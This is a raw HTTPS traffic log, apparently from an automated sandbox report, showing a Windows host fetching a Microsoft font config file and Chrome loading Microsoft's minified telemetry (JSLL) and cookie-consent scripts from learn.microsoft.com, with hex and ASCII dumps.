                                                                                                                                                                                                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                            Server: ECAcc (lpl/EF70)
                                                                                                                                                                                                            X-CID: 11
                                                                                                                                                                                                            X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                            X-Ms-Region: prod-neu-z1
                                                                                                                                                                                                            Cache-Control: public, max-age=134290
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:26:39 GMT
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            X-CID: 2


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            10192.168.2.449763184.30.17.174443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:26:41 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                            If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                            Range: bytes=0-2147483646
                                                                                                                                                                                                            User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                            Host: fs.microsoft.com
                                                                                                                                                                                                            2024-11-22 03:26:41 UTC535INHTTP/1.1 200 OK
                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                            ApiVersion: Distribute 1.1
                                                                                                                                                                                                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                            X-Azure-Ref: 0SyaoYgAAAACHM3u5nQtYS605XTu+5FyaTE9OMjFFREdFMDIxMgBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                                                                                                                                                                                                            Cache-Control: public, max-age=134388
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:26:41 GMT
                                                                                                                                                                                                            Content-Length: 55
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            X-CID: 2
                                                                                                                                                                                                            2024-11-22 03:26:41 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                                            Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            11192.168.2.44976913.107.246.634438C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:26:41 UTC549OUTGET /scripts/c/ms.jsll-4.min.js HTTP/1.1
                                                                                                                                                                                                            Host: js.monitor.azure.com
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                            Referer: https://learn.microsoft.com/
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-22 03:26:42 UTC889INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:26:42 GMT
                                                                                                                                                                                                            Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                            Content-Length: 207935
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: no-transform, public, max-age=1800, immutable
                                                                                                                                                                                                            Last-Modified: Mon, 14 Oct 2024 17:27:31 GMT
                                                                                                                                                                                                            ETag: 0x8DCEC757C1AD1D1
                                                                                                                                                                                                            x-ms-request-id: 24663fe8-301e-00d3-0bb2-2cfca8000000
                                                                                                                                                                                                            x-ms-version: 2009-09-19
                                                                                                                                                                                                            x-ms-meta-jssdkver: 4.3.3
                                                                                                                                                                                                            x-ms-meta-jssdksrc: [cdn]/scripts/c/ms.jsll-4.3.3.min.js
                                                                                                                                                                                                            Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,x-ms-meta-jssdksrc,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                            x-azure-ref: 20241122T032642Z-178bfbc474bmqmgjhC1NYCy16c00000002fg000000009wzc
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:26:42 UTC15495INData Raw: 2f 2a 21 0a 20 2a 20 31 44 53 20 4a 53 4c 4c 20 53 4b 55 2c 20 34 2e 33 2e 33 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 4d 69 63 72 6f 73 6f 66 74 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 20 28 4d 69 63 72 6f 73 6f 66 74 20 49 6e 74 65 72 6e 61 6c 20 4f 6e 6c 79 29 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 75 6e 64 65 66 69 6e 65 64 22 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 21 3d 6e 29 74 28 65 78 70 6f 72 74 73 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69
                                                                                                                                                                                                            Data Ascii: /*! * 1DS JSLL SKU, 4.3.3 * Copyright (c) Microsoft and contributors. All rights reserved. * (Microsoft Internal Only) */!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&defi
                                                                                                                                                                                                            2024-11-22 03:26:42 UTC16384INData Raw: 28 69 29 3a 28 72 3d 66 65 28 22 63 6f 6e 73 6f 6c 65 22 29 29 26 26 28 72 2e 65 72 72 6f 72 7c 7c 72 2e 6c 6f 67 29 28 74 2c 63 65 28 69 29 29 29 29 7d 53 65 28 61 3d 7b 74 68 65 6e 3a 6f 2c 22 63 61 74 63 68 22 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6f 28 75 6e 64 65 66 69 6e 65 64 2c 65 29 7d 2c 22 66 69 6e 61 6c 6c 79 22 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 2c 6e 3d 74 3b 72 65 74 75 72 6e 20 51 28 74 29 26 26 28 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 26 26 74 28 29 2c 65 7d 2c 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 72 6f 77 20 74 26 26 74 28 29 2c 65 7d 29 2c 6f 28 65 2c 6e 29 7d 7d 2c 22 73 74 61 74 65 22 2c 7b 67 65 74 3a 64 7d 29 2c 68 74 28 29 26 26 28 61 5b 6d 74 28
                                                                                                                                                                                                            Data Ascii: (i):(r=fe("console"))&&(r.error||r.log)(t,ce(i))))}Se(a={then:o,"catch":function(e){return o(undefined,e)},"finally":function(t){var e=t,n=t;return Q(t)&&(e=function(e){return t&&t(),e},n=function(e){throw t&&t(),e}),o(e,n)}},"state",{get:d}),ht()&&(a[mt(
                                                                                                                                                                                                            2024-11-22 03:26:42 UTC16384INData Raw: 28 65 2c 74 2c 6e 2c 72 29 7b 67 65 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 26 26 65 5b 74 5d 26 26 28 6e 3f 28 6e 2e 63 62 5b 74 65 5d 28 7b 66 6e 3a 72 2c 61 72 67 3a 65 7d 29 2c 6e 2e 68 3d 6e 2e 68 7c 7c 6e 6e 28 70 63 2c 30 2c 6e 29 29 3a 4d 28 72 2c 5b 65 5d 29 29 7d 29 7d 68 63 2e 5f 5f 69 65 44 79 6e 3d 31 3b 76 61 72 20 76 63 3d 68 63 3b 66 75 6e 63 74 69 6f 6e 20 68 63 28 65 29 7b 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 3d 5b 5d 3b 76 61 72 20 6e 2c 69 3d 5b 5d 2c 61 3d 7b 68 3a 6e 75 6c 6c 2c 63 62 3a 5b 5d 7d 2c 6f 3d 76 6f 28 65 2c 64 63 29 5b 4b 6e 5d 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 3d 21 21 65 2e 63 66 67 2e 70 65 72 66 45 76 74 73 53 65 6e 64 41 6c 6c 7d 29 3b 76 65 28 68 63 2c 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                            Data Ascii: (e,t,n,r){ge(e,function(e){e&&e[t]&&(n?(n.cb[te]({fn:r,arg:e}),n.h=n.h||nn(pc,0,n)):M(r,[e]))})}hc.__ieDyn=1;var vc=hc;function hc(e){this.listeners=[];var n,i=[],a={h:null,cb:[]},o=vo(e,dc)[Kn](function(e){n=!!e.cfg.perfEvtsSendAll});ve(hc,this,function(
                                                                                                                                                                                                            2024-11-22 03:26:42 UTC16384INData Raw: 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 61 2e 66 6c 75 73 68 43 6f 6d 70 6c 65 74 65 3d 65 2c 50 3d 21 30 2c 52 2e 72 75 6e 28 6f 2c 61 29 2c 66 5b 67 72 5d 28 29 2c 6f 5b 6c 72 5d 28 61 29 7d 2c 36 2c 6e 29 2c 69 7d 2c 66 5b 6f 72 5d 3d 73 2c 66 2e 61 64 64 50 6c 75 67 69 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 6f 75 29 3b 76 61 72 20 69 3d 73 28 65 5b 24 6e 5d 29 3b 69 66 28 69 26 26 21 74 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 22 50 6c 75 67 69 6e 20 5b 22 2b 65 5b 24 6e 5d 2b 22 5d 20 69 73 20 61 6c 72 65 61 64 79 20 6c 6f 61 64 65 64 21 22 29 3b 76 61 72 20 61 2c 6f 3d 7b 72 65 61 73 6f 6e 3a 31 36 7d 3b 66
                                                                                                                                                                                                            Data Ascii: (e,function(e){a.flushComplete=e,P=!0,R.run(o,a),f[gr](),o[lr](a)},6,n),i},f[or]=s,f.addPlugin=function(e,t,n,r){if(!e)return r&&r(!1),void C(ou);var i=s(e[$n]);if(i&&!t)return r&&r(!1),void C("Plugin ["+e[$n]+"] is already loaded!");var a,o={reason:16};f
                                                                                                                                                                                                            2024-11-22 03:26:42 UTC16384INData Raw: 6c 3a 31 2c 43 72 69 74 69 63 61 6c 3a 32 7d 29 2c 75 6e 64 65 66 69 6e 65 64 2c 75 6e 64 65 66 69 6e 65 64 29 2c 53 6c 3d 22 22 3b 66 75 6e 63 74 69 6f 6e 20 78 6c 28 65 29 7b 74 72 79 7b 69 66 28 6f 65 28 6f 74 28 29 29 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 74 3d 28 6e 65 77 20 44 61 74 65 29 5b 4f 73 5d 28 29 2c 6e 3d 66 65 28 65 3d 3d 3d 45 6c 2e 4c 6f 63 61 6c 53 74 6f 72 61 67 65 3f 22 6c 6f 63 61 6c 53 74 6f 72 61 67 65 22 3a 22 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 22 29 2c 72 3d 53 6c 2b 74 2c 69 3d 28 6e 2e 73 65 74 49 74 65 6d 28 72 2c 74 29 2c 6e 2e 67 65 74 49 74 65 6d 28 72 29 21 3d 3d 74 29 3b 69 66 28 6e 5b 52 73 5d 28 72 29 2c 21 69 29 72 65 74 75 72 6e 20 6e 7d 63 61 74 63 68 28 61 29 7b 7d 72 65 74 75 72 6e 20 6e 75 6c
                                                                                                                                                                                                            Data Ascii: l:1,Critical:2}),undefined,undefined),Sl="";function xl(e){try{if(oe(ot()))return null;var t=(new Date)[Os](),n=fe(e===El.LocalStorage?"localStorage":"sessionStorage"),r=Sl+t,i=(n.setItem(r,t),n.getItem(r)!==t);if(n[Rs](r),!i)return n}catch(a){}return nul
                                                                                                                                                                                                            2024-11-22 03:26:42 UTC16384INData Raw: 6f 20 74 72 61 63 6b 20 70 61 67 65 20 76 69 73 69 74 20 74 69 6d 65 20 66 61 69 6c 65 64 2c 20 6d 65 74 72 69 63 20 77 69 6c 6c 20 6e 6f 74 20 62 65 20 63 6f 6c 6c 65 63 74 65 64 3a 20 22 2b 63 65 28 72 29 29 7d 7d 2c 59 28 65 2c 22 5f 6c 6f 67 67 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 2c 59 28 65 2c 22 70 61 67 65 56 69 73 69 74 54 69 6d 65 54 72 61 63 6b 69 6e 67 48 61 6e 64 6c 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 7d 29 7d 29 7d 76 61 72 20 4e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 68 69 73 5b 67 64 5d 3d 50 74 28 29 2c 74 68 69 73 2e 70 61 67 65 4e 61 6d 65 3d 65 2c 74 68 69 73 2e 70 61 67 65 55 72 6c 3d 74 7d 2c 44 64 3d 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                            Data Ascii: o track page visit time failed, metric will not be collected: "+ce(r))}},Y(e,"_logger",{g:function(){return o}}),Y(e,"pageVisitTimeTrackingHandler",{g:function(){return c}})})}var Nd=function(e,t){this[gd]=Pt(),this.pageName=e,this.pageUrl=t},Dd=function(
                                                                                                                                                                                                            2024-11-22 03:26:42 UTC16384INData Raw: 63 6f 72 65 44 61 74 61 2c 22 62 65 68 61 76 69 6f 72 22 29 2c 75 65 28 6e 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 6e 2e 70 61 67 65 54 79 70 65 29 2c 75 65 28 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 26 26 21 75 65 28 65 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 2c 75 65 28 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 26 26 28 65 2e 6d 61 72 6b 65 74 3d 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 2c 65 2e 69 73 4c 6f 67 67 65 64 49 6e 3d 47 64 28 72 2e 5f 63 6f 6e 66 69 67 29 2c 74 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 3d 6f 63 28 29 7d 2c 69 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 73 65 74 50 61 67 65 54
                                                                                                                                                                                                            Data Ascii: coreData,"behavior"),ue(n.pageType)&&(e.pageType=n.pageType),ue(r._pageTypeMetaTag)&&!ue(e.pageType)&&(e.pageType=r._pageTypeMetaTag),ue(r._marketMetaTag)&&(e.market=r._marketMetaTag),e.isLoggedIn=Gd(r._config),t.cookieEnabled=oc()},ip.prototype._setPageT
                                                                                                                                                                                                            2024-11-22 03:26:42 UTC16384INData Raw: 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 57 69 74 68 44 61 74 61 42 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 7e 74 5b 6e 5d 2e 6e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 22 64 61 74 61 2d 62 69 2d 22 29 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 22 64 61 74 61 2d 6d 22 3d 3d 3d 74 5b 6e 5d 2e 6e 61 6d
                                                                                                                                                                                                            Data Ascii: n!0;return!1},Ap.prototype._isTrackedWithDataBi=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if(~t[n].name.indexOf("data-bi-"))return!0;return!1},Ap.prototype._isTracked=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if("data-m"===t[n].nam
                                                                                                                                                                                                            2024-11-22 03:26:42 UTC16384INData Raw: 75 74 68 54 6f 6b 65 6e 22 2c 61 3d 22 41 75 74 68 58 54 6f 6b 65 6e 22 2c 67 67 3d 22 6d 73 66 70 63 22 2c 76 67 3d 22 75 73 65 72 22 2c 68 67 3d 22 61 6c 6c 6f 77 52 65 71 75 65 73 74 53 65 6e 64 69 6e 67 22 2c 6d 67 3d 22 66 69 72 73 74 52 65 71 75 65 73 74 53 65 6e 74 22 2c 79 67 3d 22 73 68 6f 75 6c 64 41 64 64 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 73 22 2c 43 67 3d 22 67 65 74 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 56 61 6c 75 65 22 2c 62 67 3d 22 73 65 74 43 6c 6f 63 6b 53 6b 65 77 22 2c 79 65 3d 22 6c 65 6e 67 74 68 22 2c 54 67 3d 22 63 6f 6e 63 61 74 22 2c 49 67 3d 22 69 4b 65 79 22 2c 45 67 3d 22 63 6f 75 6e 74 22 2c 5f 67 3d 22 65 76 65 6e 74 73 22 2c 53 67 3d 22 70 75 73 68 22 2c 78 67 3d 22 73 70 6c 69 74 22 2c 4e 67 3d 22 73 70
                                                                                                                                                                                                            Data Ascii: uthToken",a="AuthXToken",gg="msfpc",vg="user",hg="allowRequestSending",mg="firstRequestSent",yg="shouldAddClockSkewHeaders",Cg="getClockSkewHeaderValue",bg="setClockSkew",ye="length",Tg="concat",Ig="iKey",Eg="count",_g="events",Sg="push",xg="split",Ng="sp
                                                                                                                                                                                                            2024-11-22 03:26:42 UTC16384INData Raw: 29 29 2c 65 5b 6c 76 5d 26 26 28 65 5b 6c 76 5d 3d 65 61 28 65 5b 6c 76 5d 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 65 5b 79 76 5d 7c 7c 28 65 5b 79 76 5d 3d 30 29 2c 65 5b 43 76 5d 7c 7c 28 65 5b 43 76 5d 3d 31 29 2c 6c 28 65 29 2c 65 5b 62 76 5d 29 69 66 28 55 7c 7c 61 65 29 65 5b 43 76 5d 3d 33 2c 65 5b 62 76 5d 3d 21 31 3b 65 6c 73 65 20 69 66 28 48 29 72 65 74 75 72 6e 20 57 26 26 28 65 3d 65 61 28 65 29 29 2c 48 5b 72 76 5d 28 45 76 2e 63 72 65 61 74 65 28 65 5b 49 67 5d 2c 5b 65 5d 29 2c 21 30 3d 3d 3d 65 5b 62 76 5d 3f 31 3a 65 5b 62 76 5d 2c 33 29 3b 76 61 72 20 6e 3d 65 5b 43 76 5d 2c 72 3d 63 65 2c 69 3d 52 2c 61 3d 28 34 3d 3d 3d 6e 26 26 28 72 3d 6f 65 2c 69 3d 4f 29 2c 21 31 29 3b 72 3c 69 3f 61 3d 21 43 28 65 2c
                                                                                                                                                                                                            Data Ascii: )),e[lv]&&(e[lv]=ea(e[lv])))}function a(e,t){if(e[yv]||(e[yv]=0),e[Cv]||(e[Cv]=1),l(e),e[bv])if(U||ae)e[Cv]=3,e[bv]=!1;else if(H)return W&&(e=ea(e)),H[rv](Ev.create(e[Ig],[e]),!0===e[bv]?1:e[bv],3);var n=e[Cv],r=ce,i=R,a=(4===n&&(r=oe,i=O),!1);r<i?a=!C(e,


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            12192.168.2.44977013.107.246.634438C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:26:42 UTC551OUTGET /mscc/lib/v2/wcp-consent.js HTTP/1.1
                                                                                                                                                                                                            Host: wcpstatic.microsoft.com
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Sec-Fetch-Site: same-site
                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                            Referer: https://learn.microsoft.com/
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-22 03:26:42 UTC713INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:26:42 GMT
                                                                                                                                                                                                            Content-Type: application/javascript
                                                                                                                                                                                                            Content-Length: 52717
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                            Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                            Age: 30068
                                                                                                                                                                                                            Cache-Control: max-age=43200
                                                                                                                                                                                                            Content-MD5: QT/MdZzBmCG2G2lBgIsptQ==
                                                                                                                                                                                                            Etag: 0x8DA85F6F74C6D08
                                                                                                                                                                                                            Last-Modified: Wed, 24 Aug 2022 17:34:58 GMT
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                                            x-ms-blob-type: BlockBlob
                                                                                                                                                                                                            x-ms-lease-status: unlocked
                                                                                                                                                                                                            x-ms-request-id: 5ef9cefc-301e-002d-1448-3c73ac000000
                                                                                                                                                                                                            x-ms-version: 2009-09-19
                                                                                                                                                                                                            x-azure-ref: 20241122T032642Z-15b8b599d88vp97chC1TEB5pzw00000000u000000000bxtm
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:26:42 UTC15671INData Raw: 76 61 72 20 57 63 70 43 6f 6e 73 65 6e 74 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 32 32 39 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 77 69 6e 64 6f 77 2c 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 6e 29 7b 69 66 28 74 5b 6e 5d 29 72 65 74 75 72 6e 20 74 5b 6e 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 72 3d 74 5b 6e 5d 3d 7b 69 3a 6e 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 6e 5d 2e 63 61 6c 6c 28 72 2e 65 78 70 6f 72 74 73 2c 72 2c 72 2e 65 78 70 6f 72 74 73 2c 6f 29 2c 72 2e 6c 3d 21 30 2c 72 2e 65 78 70 6f 72 74 73 7d 72 65 74 75 72 6e 20 6f 2e 6d 3d 65 2c 6f 2e 63 3d 74 2c 6f 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65
                                                                                                                                                                                                            Data Ascii: var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e
                                                                                                                                                                                                            2024-11-22 03:26:42 UTC16384INData Raw: 29 7b 72 65 74 75 72 6e 20 65 3f 65 2e 72 65 70 6c 61 63 65 28 2f 26 2f 67 2c 22 26 61 6d 70 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3c 2f 67 2c 22 26 6c 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3e 2f 67 2c 22 26 67 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 22 2f 67 2c 22 26 71 75 6f 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 27 2f 67 2c 22 26 23 30 33 39 3b 22 29 3a 22 22 7d 2c 65 7d 28 29 2c 61 3d 6e 2e 6c 6f 63 61 6c 73 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 2c 6f 2c 6e 2c 72 2c 69 2c 61 29 7b 74 68 69 73 2e 64 69 72 65 63 74 69 6f 6e 3d 22 6c 74 72 22 2c 74 68 69 73 2e 70 72 65 76 69 6f 75 73 46 6f 63 75 73 45 6c 65 6d 65 6e 74 42 65 66 6f 72 65 50 6f 70 75 70 3d 6e 75 6c 6c 2c 74 68 69 73 2e 63 6f 6f 6b 69
                                                                                                                                                                                                            Data Ascii: ){return e?e.replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;").replace(/"/g,"&quot;").replace(/'/g,"&#039;"):""},e}(),a=n.locals,l=function(){function e(e,t,o,n,r,i,a){this.direction="ltr",this.previousFocusElementBeforePopup=null,this.cooki
                                                                                                                                                                                                            2024-11-22 03:26:42 UTC711INData Raw: 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c 61 62 65 6c 3a 68 6f 76 65 72 3a 3a 61 66 74 65 72 20 7b 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 68 6f 76 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c
                                                                                                                                                                                                            Data Ascii: or"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + label:hover::after {\n background-color: "+e["radio-button-hover-background-color"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + l
